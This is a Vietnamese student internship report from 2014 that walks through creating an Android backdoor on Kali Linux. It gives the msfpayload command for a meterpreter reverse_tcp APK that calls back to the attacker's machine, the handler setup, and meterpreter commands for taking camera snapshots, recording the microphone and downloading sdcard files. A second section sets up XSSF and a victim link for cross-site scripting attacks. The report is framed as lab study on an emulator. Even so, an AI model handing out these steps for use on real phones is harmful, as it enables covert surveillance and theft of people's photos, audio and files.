Tuần 3 tạo mã độc trên kali linux
Transcript of Tuần 3 tạo mã độc trên kali linux
BÁO CÁO THỰC TẬP – Tuần 3
Đề tài:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ
liệu như danh sách contact, tin nhắn trên điện thoại sử
dụng Android và gửi ra ngoài
Sinh viên thực hiện: Tô Thị Hường
GVHD: Thầy Võ Đỗ Thắng
TP.HCM, ngày 25 tháng 7 năm 2014
Nội dung: Tạo mã độc trên Kali Linux để xâm
nhập Android
1. Tạo lập Backdoor
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở
payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên
thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn NAT:Used to share the host’s IP address
Bấm vào Edit -> Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở terminal và gõ dòng lệnh: msfpayload android/meterpreter/reverse_tcp
lhost=192.168.220.128 lport=8080 R > /root/Desktop/app.apk
192.168.220.128 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp
backdoor.
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Google Nexus giả lập, tải về app.apk, cài đặt và mở lên được giao diện như dưới,
nhấp vào nút reverse_tcp:
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
Để xem thông tin về máy, nhập lệnh SysInfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở
phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file app.apk trong thư mục download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
2. XSSF
Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk ./ --force
Tiếp theo là lệnh: xssf_urls
XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main
Địa chỉ gửi cho nạn nhân là: http://192.168.220.128:80/xssf/test.html
Kết quả trên terminal:
Lệnh xssf_victim dùng để hiện thông tin nạn nhân
Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn
Tiếp tục lệnh search auxiliary/xssf
Refesh lại trang web sẽ thấy thông tin nạn nhân
Tiếp theo sử dụng lệnh alert để cảnh báo nạn nhân: